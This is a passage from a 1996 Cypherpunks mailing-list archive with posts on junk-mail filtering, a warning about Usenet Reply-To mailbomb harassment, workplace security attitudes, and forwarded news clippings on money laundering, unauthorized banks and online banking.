addresses and not having theur plugs pulled by merely scrubbing their lists
from people who object, they'll salivate over this prospect and kick the asses
of whoever jeopardizes their business by mailing to "unscrubbed" lists.

> I'd say it's a safe bet that the unscrupulous could easily sell a large,
> up-to-date list of email addresses of people who DON'T want junk email to
> people who want to send such mail.

I rather doubt it. Business people tend to be much smarter than the geeks
you see at academic computing centers and ISP's.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Wed, 18 Sep 1996 17:08:26 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: WARNING: Major Net-Abuse
Message-ID: <Pine.3.89.9609172157.A5778-0100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain


I don't know the full details about this, so I'll try to give as good an 
explanation as I can.  Since sometime yesterday, someone has been posting 
huge binaries all over Usenet, usually to at least 20 groups at a time.  
The files are usually several thousand parts big at the least, and are 
posted to either groups in which people are likely to respond with 
emailbombs, or test groups that send you a reply if the message appears 
on them.  What some $#&!@-heads are doing is changing the Reply-To 
headers to the addresses of people who they dislike or want to harass.  
See where I'm going now?  10000 posts to a test group with your address 
on it = 10000 emails in your inbox.

I posted this because there are some people on both of these lists who 
might be the target of one of these spams, and you might want to get your 
killfiles ready, just in case.  

Thanks for your time, and sorry if I annoyed anyone with the off-topic 
post.  

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 14:09:43 +0800
To: cypherpunks@toad.com
Subject: Re: Dealing with junk mail
In-Reply-To: <01I9L7W8DYNA8ZO0TR@delphi.com>
Message-ID: <8HHFuD94w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


JMKELSEY@delphi.com writes:
>                                                I just don't think
> I'd like Delphi to start filtering my e-mail without asking me for
> permission and instructions first.)

Likewise a number of AOL users don't like the idea of AOL deciding what
they can and can't read. (By the way one of the good things about AOL is
that they ignore all Usenet cancels.) AOL is promising to let its users
filter their incoming mail the way they want to by the end of September.

> Each user has a mail filter with a set of rules written either by or
> for that user.  The mail filter does one of four things with each
> piece of e-mail it receives:
>
> a.   It lets the e-mail through immediately.  (E-mail from friends,
> employers, employees, family members, etc. would probably be in this
> category.)

This should not be the default.

> b.   It discards the e-mail immediately.  (E-mail from people you
> really didn't like, and from people who have spammed you in the past
> would probably be in this category.)

Or may from mailing lists submitted by known idiots.

> c.   It puts the e-mail on hold in some storage area.

This should be the default for unknown senders.

> d.   Send e-mail back to the sender, informing him of conditions
>      under which the user is willing to accept this e-mail.  This
>      might be things like requiring anonymous users to provide some
>      minimal kind of identity, or telling senders ``I'll read your
>      e-mail for one dollar in digicash,'' or ``I'll read your e-mail
>      if you carry out this computationally expensive calculation, or
>      some other thing.
>
> For e-mail in the third category, some kind of summary report is
> sometimes generated, to be sent to a server.  The server collects
> these reports, and uses some kind of system (maybe rule-based, but
> probably involving scores to estimate probability of spam or other
> unwanted e-mail) to determine what is and is not spam, and with what
> probability.  It then sends to each of its subscribers, every day or
> so, a report indicating scores for users' messages.  (These should
> be individualized.)

One can simply choose to read the a) mail now and c) mail later.

Consider this scenario:

10:00 Eve sends junk e-mail to Alice and Bob.
10:05 Alice reads her urgent e-mail; leaves non-urgent e-mail for later.
10:30 Alice reads non-urgent e-mail, discovers junk mail from Eve.
10:31 Alice posts a warning to a Usenet newsgroup about junk e-mail from Eve,
 specifying a pattern than matches Eve's junk mail, and perhaps an address
 for postmaster complaints.
10:40 Bob starts reading his e-mail. Before he begins, his e-mail reading
 program fetches new e-mail notices from the usenet newsgroup, finds the
 ones from the issuers Bob trusts, checks their PGP signatures, and adds their
 patterns to its database. It then junks Eve's letter (discards it or bounces
 it to the postmaster, whatever Bob chooses)

Note that procmail can't do it - procmail would get Eve's junk mail at 10:00.
We want to delay the processing of the incoming queue to get the latest
available junk mail notices.

> The junk e-mailers can try various countermeasures to this.  The
> most obvious are:
>
> a.   Try to hit people who aren't using a good junk-mail filter.
> b.   Try to make it against the law to use a junk-mail filter.
>      (Perhaps this would be the case only for PSA spams?)

It's probably a bad idea for an ISP to impose such filters on users
without letting them "opt out", as AOL tried to do.

> c.   Try to disguise their e-mail to make it not obviously junk
>      e-mail, and simultaneously to alter each message to avoid
>      detection by the servers, by making changes to each message,
>      timestamp, and claimed sender ID.

That would an interesting technical challenge.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 18 Sep 1996 12:59:12 +0800
To: attila <attila@primenet.com>
Subject: Re: "But if it saves just one child."
In-Reply-To: <199609160656.AAA23532@InfoWest.COM>
Message-ID: <Pine.BSI.3.91.960917215041.5280E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 16 Sep 1996, attila wrote:

> = .The rallying cry heard so often these days: "But if it saves just one child."
> = .


ACCKKKKKIK.

SYN
ACK
GAK
BLAH.

Read some Ayn Rand.
This must end.

IOW:  I call bullshit.  I call total bullshit.
The net, fomerly my oasis, needs death.

(To all of those joyous government individuals who may have written my 
name down, now, in unbridled glee, please make sure to spell it 
correctly, dot the i's, and have a really groovy day).

Sovreignly,
Millie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 18 Sep 1996 12:57:20 +0800
To: "Brock N. Meeks" <brock@well.com>
Subject: Re: All Bets Off
In-Reply-To: <Pine.3.89.9609161420.A11988-0100000@well.com>
Message-ID: <Pine.BSI.3.91.960917215626.5280G-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


A bit worried, now, Brock?
Not like we'd have access.

I smell a new era / area 51.

Smells like lemons.
(ie -- it sucks)

-Millie,
who is not even premenstrual. :)


On Mon, 16 Sep 1996, Brock N. Meeks wrote:

> 
> Just so this isn't hanging in cyberspace forever, my $5,000 bet for 
> anyone to prove the TWA 800 flight was downed by a U.S. missile is now 
> *off the table*.  
> 
> 
> It's been two-plus weeks since I tossed out the bet and no one took me up 
> on it, so it's now being formally withdrawn.
> 
> --Brock
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 18 Sep 1996 16:32:44 +0800
To: Rick Osborne <osborne@gateway.grumman.com>
Subject: Re: PGP in the workplace
In-Reply-To: <3.0b16.32.19960917232055.005410c0@gateway.grumman.com>
Message-ID: <Pine.3.89.9609172206.A9162-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 17 Sep 1996, Rick Osborne wrote:
[clueless sysadmin story elided] 
> Now, seeing as I'm fairly new to the Corporate world, but is this something
> common?  I know when I was at college, poking around was expected and
> encouraged, as it helped find and plug holes in the system.  But this is
> almost like some kind of protection racket here!

This never happend in any company I worked for. Don't think I'd last in 
such an environment. Neither, one should think, will a company where half 
the people have root. Three man operations excepted.

Just my $0.02,

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 19:29:30 +0800
To: cypherpunks@toad.com
Subject: Re: PGP in the workplace
Message-ID: <ae64d1c30c021004635b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:20 AM 9/18/96, Rick Osborne wrote:

>Upon explaining to them that I was simply trying to make sure of my own
>security, I was told that I was to just assume that I was secure, and that
>*any* 'poking around' was found to be "highly aggravating" and could only
>only "exascerbate the situation further."
>
>Luckily, I had to get to class, so I cut the conversation before it could
>get any more out of control.
>
>Now, seeing as I'm fairly new to the Corporate world, but is this something
>common?  I know when I was at college, poking around was expected and
>encouraged, as it helped find and plug holes in the system.  But this is
>almost like some kind of protection racket here!

Sadly, this is common. Anybody taking undo interest in security "must have
something to hide."

Be aware that the effects can be a lot worse than just "being noticed," or
even of being dismissed. Companies have been known to call in the police.
(And since you are posting with a "Grumman" account, this could trigger
visits by the DIA and other such agencies.)

This happened in a well-publicized case up north, and I am convinced (from
reading some of the details) that the programmer was not doing anything
criminal. Even many who worked with him have expressed the same views, that
he was just an unusually curious and attentive security expert. Some of
them tell me they--and their employer!--were surprised the case actually
went to trial.

But the DA decided, for whatever reason, to prosecute on felony charges. I
can only speculate about the pressures, the desire for publicity in a
trendy new area ("computer crime"), and about the relative importance of
this employer to the local economy.

So, don't get too curious. Don't change your passwords more than your
neighbors do (or at least not more than 2.13 standard deviations more often
than is the statistical average of all employee-units within 7 cubicles of
you in all directions). And whatever you do, never, never, never point out
security flaws. This is a sure sign of your guilt. Or your smarty-pants
attitude, which is actually worse.

(Never cast perls before swine.)

(All of this is explained daily in "Dilbert," of course.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Llywarch Hen <ecgwulf@worldnet.att.net>
Date: Wed, 18 Sep 1996 19:19:28 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant
Message-ID: <2.2.16.19960918053037.26970514@postoffice.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


"In July, Mr Lee [Kuan Yew, senior minister of Singapore] described an
insight that came to him watching a sheepdog show in Australia. You start
off with a group of young puppies, and 'weed out those who are not going to
be successful . . . You either have those qualities or you don't.' It was,
said Mr Lee, 'the simplest of all the lessons in life.'
        From _The Economist_, September 14th 1996.

-- Llywarch Hen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 14:10:50 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <3kJFuD96w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Money Laundering Alert: August 1996

'Unauthorized' Banks Pose Laundering Threat

They are subject to none of the recordkeeping or reporting requirements
of the Bank Secrecy Act, receive no examinations from any banking
regulator, and may be on your bank's currency transaction reporting
exemption list.

The Office of the Comptroller of the Currency refers to them as
"entities that may be conducting banking operations in the U.S. without
a license." Money launderers probably refer to them as dreams come true
and, unless legitimate financial institutions are alert, can use them to
place illicit proceeds into the financial system.

They are "unauthorized" banks, and for the past five years the OCC has
been disseminating advisories to legitimate U.S. banks - but not to
consumers - in an effort to expose their existence and halt their
illegal operations.

These so-called "banks" offer a variety of banking services, often at
lower fees and better interest rates than legitimate banks offer. What
makes them different from a legitimate bank - and attractive to money
launderers -- is that they are not licensed by any U.S. banking agency
and thus do not have to meet regulatory standards.

Because the OCC and other federal bank regulators are not investigative
agencies, they can do little more than report these institutions to
those who are. If the entities are found to be operating a bank without
a license they can be prosecuted under the Glass-Steagell Act (Title 12,
USC Sec. 378(a)(2)).

Such prosecutions are rare. In one case in 1994, initiated by Federal
Reserve Board examiners, the principals of Lombard Bank, Ltd., were
charged with operating an unauthorized bank through a payable-through
account at American Express Bank International in Miami. Lombard, which
had been "licensed" in the South Pacific money laundering haven of
Vanuatu, offered its Central American customers virtually full banking
services in the U.S. through its PTA (MLA, Sep. 1994).

Earlier this year, the OCC released a list of more than 50 "banks" known
to be operating without authorization. OCC officials say the number
grows steadily. Some of the "banks" say they are licensed by foreign
countries or U.S. states to conduct banking business. Others, such as
the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer
services in the U.S. despite edicts from foreign banking authorities to
cease doing business.

The unauthorized entities have a common trait. They usually have names
that are similar to those of well-known legitimate institutions. The OCC
list includes the Bank of England, a Washington, D.C., entity not
associated with London's famous "old lady on Threadneedle Street" and
Citicorp Financial Services, a Beverly Hills firm not associated with
the better-known institution of that name. It also includes the First
Bank of Internet, which heralds itself as the first bank in cyberspace.

Through its periodic "special alerts," the OCC warns banks to "view with
extreme caution any proposed transaction involving any of the listed
entities." It makes no effort to educate members of the general public
who unknowingly place their money and trust in those uninsured
institutions.




American Banker: Friday, August 30, 1996

Swift Near Alliance in Trade Document Automation

By STEVEN MARJANOVIC

Swift, the international banking telecommunications network, wants to
play a bigger role in trade finance and the exchange of related
documentation.

Sources said the Brussels-based organization will soon take a position--
perhaps as early as its September board meeting-- on whether to work on
trade automation in cooperation with another consortium, called Bolero.

Such a move would involve an increase in nonbank participants on a
bank-owned network that has approached such liberalization cautiously.

Swift, formally the Society for Worldwide Interbank Financial
Telecommunication, is used by 5,300 banks for exchanging messages in
such areas as funds transfer, foreign exchange, and securities.

The network averaged about 2.7 million messages a day in July,
representing daily dollar volumes exceeding $2 trillion.

Officials said Swift is nearing a decision to work with the Bolero
Association, which is forming an electronic registry for the so-called
"dematerializing" of trade documents. Swift could provide the "platform"
for allowing banks and corporations to exchange such documentation as
letters of credit and bills of lading.

Bolero was formed in 1994 with funding from the European Commission, but
has not formulated concrete operating plans. Its members include
Citicorp, Barclays Bank PLC, and other multinational banks and
corporations.

Peter Scott, trade services market director at Swift, said it has been
in discussions with London-based Bolero since December 1995 about
joining forces to automate the exchange of trade documents.

"Bankers are beginning to sense both the opportunities in those areas
and the threats to them from an intermediary stepping in and potentially
taking away the business," Mr. Scott said.

Trade-document capability "is not a heavily utilized area within Swift
at the present time," he said.

The potential in automation is obvious to Bolero officials. At the New
York Banktrade Conference recently, John McKessy, the association's
North American representative, said the annual value of goods moved
internationally approaches $4 trillion.

He estimated current international trade requires some three billion
documents to be issued and managed.

The cost of dealing with paper alone eats up about 7% of the total value
of those goods, as much as $280 billion, Mr. McKessy said.

Bank revenues from issuing letters of credit last year were just over $1
billion, according to a soon-to-be-released survey by the U.S. Council
on International Banking.

Anthony K. Brown, senior vice president of trade services at MTB Bank,
described trade transaction processing as "extremely cumbersome and
tedious, prone to mistakes and delays (that) can be a hindrance to the
completion of a transaction."

MTB is a $400 million-asset merchant bank based in New York. About 80%
of its $100 million in loans are trade-related.

The paper-shuffling costs are not borne entirely by banks. Import/export
companies, insurers, freight forwarders, and various government
inspection agencies are also involved.

"The question is whether Swift wants to do it," said Dan Taylor,
president of the New York-based U.S. Council.

"Swift is going to act fairly quickly on this," he added.

Mr. Taylor said Swift officials will likely grapple once again with the
political and philosophical issues of giving nonbanks more access to
Swift, and to payment systems generally.

In 1995, the network granted partial access to nonbanks after years of
heated debate.

"You always have this push and pull, where some banks would like Swift
to do certain things" while others want the network to focus on the
money transfer business, Mr. Taylor said.

"If Bolero succeeds and Swift joins, I think it will move fairly
rapidly, but I'm not sure that Bolero is going to be the only thing out
there."

He said Bolero might evolve using value-added networks - or intranets -
like the IBM Global Network and General Electric Information Services
Co., or perhaps even the Internet.

Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is
apparently talking to several providers of private, value-added networks
and may soon enter a contract with one.

CSI letter-of-credit software leads the pack in banking, with about a
16% market share, Mr. Taylor said.

The company recently formed a business unit called Electronic Documents
International, which has developed an Internet-based system for
initiating letters of credit. CSI spokesman George Capsis said the
software, Import.com, creates "about 30 key documents involved in
international trade."

The Internet, enhanced with security features, may help the trade
industry reduce paper-related costs, especially at smaller companies
overseas.

CSI managing director Andre Cardinale said customers need only to "dial
into a bank's Internet server, pull up the Import.com application, and
actually fill in the details to create a new letter of credit or an
amendment to an existing one."

While Bolero may find a place on the Internet or a GE-type network, Mr.
Cardinale said the ultimate push may yet come from the banking industry
working collectively through Swift.

He said Swift opposition from nonbank constituencies that are concerned
the telecommunications cooperative will be more sympathetic to banks
when disputes arise.

But "if Swift does it," he added, "it will bring banks into the universe
far more - pardon the pun - swiftly."


Crain's New York Business: August 26, 1996

Bloomberg to Detail Growth of Information Empire

Michael Bloomberg made a name for himself on Wall Street with his
trading acumen and mastery of the computer systems that were becoming
crucial to success in the securities business.

But no one suspected when he left Salomon Brothers in 1981 that in the
next decade he would build the fastest-growing provider of financial
information in the world.

Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated
sales of $600 million, will be the keynote speaker at the fifth annual
Crain's ''Growing a Business Expo,'' to be held this year on Thursday,
Oct. 24.

The event will take place at the New York Hilton & Towers from 8 a.m. to
1 p.m. It is presented by Citibank and co-sponsored by Con Edison and
Empire Blue Cross and Blue Shield.

Last year, more than 1,000 growing business owners and managers attended
the expo, which provides information for companies operating in the city
regarding potential suppliers, financial resources and government
programs.

The cost to attend the event is $45 and includes a continental
breakfast. Individuals registering before Sept. 6 can bring a colleague
for free. To register, call Flagg Management at (212) 286-0333.

In addition to Mr. Bloomberg's speech, attendees will be able to attend
seminars on financing and other help available from the city, financing
techniques, energy cost savings programs and how to reduce health
insurance costs. An expected 135 exhibitors will be offering products
and services of use to growing companies.

Crain's New York Business editors will discuss how a growing business
can get coverage in Crain's and in other publications.

The heart of Mr. Bloomberg's empire is a news gathering operation that
sends information through 62,000 computer terminals installed on the
desks of investment professionals around the nation. His company
provides the latest financial news and sophisticated tools to analyze
information.

The company he has built is noted for its lack of bureaucracy despite
its growth to 2,000 employees. Its hallmarks are hands-on leadership and
an entrepreneurial atmosphere where employees receive perks such as free
food.

Mr. Bloomberg has extended his reach to include an all-news radio
station in New York, WBBR; Bloomberg Personal TV; syndicated television
shows; a monthly personal finance magazine; and a similar magazine for
institutional investors.


American Banker: Friday, September 6, 1996

America Online Opens a New Banking Channel

By DREW CLARK

Nineteen banks - national home banking stalwarts such as Citicorp and
BankAmerica, plus a complement of less prominent regionals - have
climbed onto the America Online bandwagon.

Most already offer their customers several options for banking via
personal computer and view America Online, with its six million
subscribers, as a way to appeal to a broad cross-section of computer-
literate consumers.

Fourteen of the AOL banking partners will be delivering services through
BankNow, a software package developed for the interactive network by
Intuit Inc.

The other five banks have opted to use their own software. One of them -
Security First Network Bank, which operates entirely on the Internet -
will invite AOL users in through their Web browsers.

With its announcement this week, America Online Inc. takes its place
among the many alternative "channels" for on-line banking.

Many of the banks on AOL's list are simultaneously cooperating with
other companies that are themselves competitors, such as Intuit and
Microsoft Corp., suppliers of the Quicken and Money financial management
software, respectively.

Also crossing competitive lines, America Online said its subscribers
will be able to bank from home with PC software from three suppliers
other than Intuit: Checkfree Corp., Online Resources and Communications
Corp., and Visa Interactive.

"Everyone understands that there is competition in the home banking
arena," said David Baird, general manager of the personal finance
division at America Online, based in Dulles, Va. "To align ourselves
with exclusively one company would be a mistake."

Intuit can count on 14 initial bank users of BankNow. Spokesmen for the
other three system vendors declined to say when they expect to have home
banking products available for the AOL channel.

Experts noted that AOL and Intuit could be a strong tandem, in that they
dominate their respective businesses.

Intuit's Quicken is the leading brand in personal finance software. The
company claims more than 9 million active users and a market share of
about 80%.

America Online's subscriber base of six million is as big as those of
its next two competitors, Compuserve and Prodigy, combined.

The financial institutions currently offering BankNow are: American
Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of
Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama,
CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD
Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York,
Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of
California.

More plan to offer BankNow-based services through AOL later this year:
BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First
Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon.

Unlike Quicken, BankNow software is available free to America Online
subscribers.

Banks' fees will vary. First National Bank of Chicago said it will
charge $3.95 a month for on-line banking and $9.95 a month for other
services that include bill payment.

Centura Banks Inc. said it will offer on-line banking free, and charge
$5.95 a month for bill payment.

Intuit officials declined to disclose what its Intuit Services Corp.
processing unit will charge to handle these transactions for banks.

Some of Intuit's larger bank partners chose not to offer BankNow because
they already promote their own PC banking programs.

For example, Citicorp, First Union, and Wells Fargo each support
Quicken, but passed on BankNow. Instead, they are paying a premium for a
"button" on America Online's banking screen that will eventually link
users to a proprietary home banking program.



AP Online: Thursday, September 5, 1996

House Probes Money Laundering

By ROB WELLS

House Banking Committee members on Thursday urged a Treasury Department
agency to step up its efforts to halt money laundering by Mexican drug
lords.

Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement
Network to put in place new regulations to plug a significant loophole
that allows Mexico's drug dealers to place their ill-gotten profits back
into the U.S.

Bachus, chairman of the House Banking oversight subcommittee, said
Congress gave authority to FinCen in 1994 to put in place new rules that
would prevent drug dealers from using foreign bank drafts, a type of
check, to evade currency reporting restrictions.

''That effort is long, long overdue,'' Bachus said.

Rep. Henry Gonzalez, D-Texas, asked the agency to provide further
details about suspected money laundering in his home town of San
Antonio, particularly the source of a $3 billion cash surplus in the San
Antonio Federal Reserve Bank.

The issue arose as Bachus' panel began exploring the dramatic rise of
narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the
ease with which drug dealers can ship their profits to the south. Money
laundering refers to the practice by which drug dealers, mobsters and
others funnel their illegal profits into the banking system through
businesses or other means.

Bachus said estimates of drug profits laundered through Mexico range
from $6 billion to $30 billion per year. Stanely E. Morris, FinCen's
director, defended his agency's record, saying a combination of new
rules and tougher enforcement in the past decade has ''made it more
difficult to launder money in the U.S.'' and increased the costs of
money laundering. Morris' agency enforces the Bank Secrecy Act, a key
weapon against money laundering.

As for the new rules aimed at foreign bank drafts, Morris said the
regulations are more difficult than first expected because such
restrictions also could hinder legitimate commerce. He said the proposal
would be released soon.

FinCen is working on other fronts to combat money laundering, which
includes a new computer system that tallies bank fraud to help
regulators gain an early warning of money laundering.

In addition, the Clinton Administration assisted Mexico in adopting new
anti-money laundering rules earlier this year. And Treasury Secretary
Robert Rubin convened a conference of 29 nations in December 1995 to
focus on the money laundering problem.

One committee member, Rep. Maxine Waters, D-Calif., addressed the
political context of the hearings.

Waters said she was suspicious that the Republican-led Congress was
holding ''a rash of hearings this month ... on the subject of drugs just
as Presidential candidate Dole tries to use the issue as part of his
campaign strategy against President Clinton.''

Waters said if the GOP-led House ''is truly serious about the impact of
drugs'' it should hold hearings about charges raised in a San Jose
Mercury News investigative series last month concerning the role
CIA-backed rebels in Nicaragua played in bringing crack cocaine and
weapons to Los Angeles and other cities.

Bachus told Waters the hearing wasn't motivated by politics and that he
had personally been involved in anti-drug efforts prior to his election
to Congress.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 15:02:43 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <HoJFuD97w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times: Wednesday, September 4, 1996

IT: A Spider's Web for the Banking Sector

Interview with Joseph De Feo

By Paul Taylor

The influence of network computing and other technologies extends into
all aspects of the industry. Barclays' director of group operations and
technology believes it will have a profound effect on traditional
banking. 'It's going to change the whole way business is conducted,' he
forecasts

Joseph De Feo has built up a formidable reputation as an effective
business leader and banking visionary since he joined Barclays Bank as
director of group operations and technology nearly seven years ago.

American-born Mr De Feo, who joined Barclays from merchant bankers
Morgan Grenfell after spells with both Goldman Sachs, the Wall Street
investment bank, and Chase Manhattan, the third-biggest US bank, is also
widely regarded as one of the banking industry's most outspoken, and
influential, IT users.

He believes the main issue facing the banking industry is the impact of
electronic delivery mechanisms and the changes which will be wrought by
introducing electronic delivery to replace physical branch delivery in
retail banking services.

But although he believes changes in retail banking may be the most
visible, he says the impact of the broader capability of networks and
networking will be just as dramatic on the wholesale and investment
banking business.

"It is engendering a situation in which there will be a wholesale
reconstruction

of the value chains in the business model for the industry, where you
could envision networks of specialist companies, each focused on a
specific area - say research, analytics, trading, investment banking,
distribution. . .

"This sort of change has actually occurred in other industry sectors -
the commodity end of the business is being concentrated into a smaller
number of global producers, and the rest of the business is being
fragmented among many thousands of very focused and specialised
players." He believes that, faced with such challenges, banks will adopt
different strategies. Some, such as JP Morgan in the US, will quit the
"manufacturing" end of banking, and sub-contract out the processing.

Others will specialise in transaction processing, in much the same way
that National Westminster Bank is providing the back-office capability
for supermarket chain Tesco's recently-launched loyalty card in Britain.

Overall, he thinks the number of jobs in retail banking will fall as
capital is substituted for labour. "I think the aggregate labour content
in all aspects of the business will go down, but not at the same rate as
it will in retail banking."

In Britain, he warns, the adjustment will be disproportional, "because
we hesitated on the capitalisation of the automation of the branch
networks."

Delaying automation of the traditional branch networks could also make
it more difficult for the banks to respond to new and often lower-cost
competitors, including retailers such as Marks and Spencer and Virgin
which do not have the same infrastructure costs.

In addition, he notes, it takes time to respond to new competition and
new delivery channels. "You still have to support the branch network.
The more inefficient that branch network is, the higher the burden of
cost - so you are really stuck if you have huge costs."

Unlike some of his colleagues, however, Mr De Feo does not believe that
bank branch networks will disappear overnight. "When I first joined the
group, lots of people were saying we need to cut the branch network in
half in the long run. It was a real big issue - we were obsessed with
the numbers of branches. I kept saying to them that you have to start on
a more rational base and judge what is effective for the group to have
as a physical branch distribution network."

While he believes the bank's branch network is still costing a lot more,
probably five or six times more, than it ought to, he argues that the
decision on an individual outlet "could change very dramatically if the
branch was much cheaper to keep open."

"We have not closed nearly as many branches as people had originally
thought we were going to, because the cost of us having an outlet open
is much lower than many other banks," he says.

Barclays has cut the cost of its branches "by reducing the labour
content, by having more customer volume go though each branch, so that
the effectiveness and efficiency of an outlet is improved."

He notes that in the US, "if you count electronic branches, there are
more branches opening - they are not closing branches. . . the
individual cost of those locations is a fraction of what it is in this
country."

Even with the advent of electronic purses and smart cards, Mr De Feo
believes there will still be a need for physical bank outlets. "We
really need physical bits of paper in our hand to do business. . . so it
is going to take a long time to get rid of the physical locations;
probably 25-30 years." Ahead of that, he believes there could actually
be an increase in bank outlets. "I would predict that you will see an
increase in penetration in supermarkets of electronic branches, or
[branches] where there is one person, in this country.

"I think you will see more express branches like we have just put up in
Tunbridge Wells, which will either be semi-manned or unmanned." He
thinks these low cost "convenience branches" will be supplemented by
telephone banking, or banking via a digital television or via personal
computer.

"We had better do it because we are going to struggle strategically to
keep our branch identity, the way things are going," he says. "We have
got strong branch identity in the industry, but that could be usurped
very quickly, especially for the traditional products because we don't
satisfy primary needs."

Mr De Feo makes his point using a potential car buyer as an example. "If
you need to borrow money for a car, it is not because you want to borrow
money, it's because you want a car." If, as is beginning to happen, car
manufacturers bundle in the financing, "why would you bother to go to a
bank?"

If the carmaker has a good credit rating, it can raise money cheaper
than the banks - so it is sensible for the carmaker to arrange the
finance because it can make an additional small profit on the loan.

Like other large financial institutions, Barclays is a big IT spender.
But does Mr De Feo think that the bank gets value for money?

"I think that in Barclays we are now getting to the point where we are -
and it shows in our results, and in the recognition we are getting, and
the way in which the business attitude towards IT has changed. The level
of suspicion that IT was sort of a thing that was on its own, and
spending money because they wanted more toys, is dissipating.

"If you look at the core businesses of the group, whether you are
talking about BZW or the asset management business, we are now much more
thoroughly integrated in terms of how technology is being used. We have
still got a way to go because we are not on an appropriate strategic
platform because the knowledge gap is still there and we need to
understand better how these technologies are going to transform
business.

Sophisticated banking IT systems, such as those used in credit behaviour
scoring, knowledge-based techniques and corporate lending assessment,
are now commonplace. "IT has improved the quality of our lending, our
decision-making, our communication with our customers, because it is
clearly more objective. It is more explainable; it is not like I turned
you down for a loan because I don't like the look of you."

He believes the relationship between banks and the IT vendors has also
changed. "It is a matter of choosing partners now," he says, "the
functional differences are less significant in vendor selection than
they used to be."

Mr De Feo argues that one of the biggest challenges facing the financial
services sector is ensuring that the wide variety of legacy systems work
together. "That glue - how you get the network of these applications
brought together - is extraordinarily important. Mr De Feo says that IT
users need infrastructure standards which would allow different
proprietary technologies to be brought together.

"The Internet offers some of it but the Internet is weak in systems
management and security. The most important aspect of the Internet is
that it has given a glimmer of what is possible with network-based
computing.

"It is like a very weak light-bulb going on in an absolutely dark room,
and what I worry about is that we will not be able to fulfil the promise
because there are so many holes in the management and the security side
of it.

"We are OK now because it is being used as an information dissemination
vehicle, and an e-mail vehicle, but when we start doing serious
applications using that technology it's all going to bubble to the
surface and we're going to see the same sort of problems with the
Internet as enterprises are having in gluing together computer systems
that were built on IBM or Digital Equipment technology."

Eventually, Mr de Feo believes Microsoft will produce the "glue" to bind
disparate systems together, but he cautions: "It is going to be very
hard for Microsoft because it is going to push them into spaces they
have never occupied before."

Similarly, he believes that the real potential of network computing will
only be realised if it enters the commercial sphere. He says: "That will
only happen if the financial services element is solved. We have got to
get all that sorted out, so all of this has got to be brought together
at some point soon, otherwise things will go into a slowdown until they
get resolved.

"There are all sorts of initiatives to work on: the security, and work
on the systems management, and so on. But the cohesiveness of those
efforts is not apparent."

Ultimately he believes network computing and other technologies will
have a profound effect on traditional banking.

"It's going to change the whole way business is conducted," he says.
"The influences of all these technologies extends like a spider's web
out into all aspects of the industry."



Financial Times: Wednesday, September 4, 1996

Global Finance Sector Maintains Its IT Edge

By Paul Taylor

>From Internet banking and multimedia kiosks to electronic trading rooms
and risk management systems, the future of the global financial services
industry is inextricably linked to information technology.

The financial services sector is already one of the biggest spenders on
information technology -- spending made necessary not just to reduce
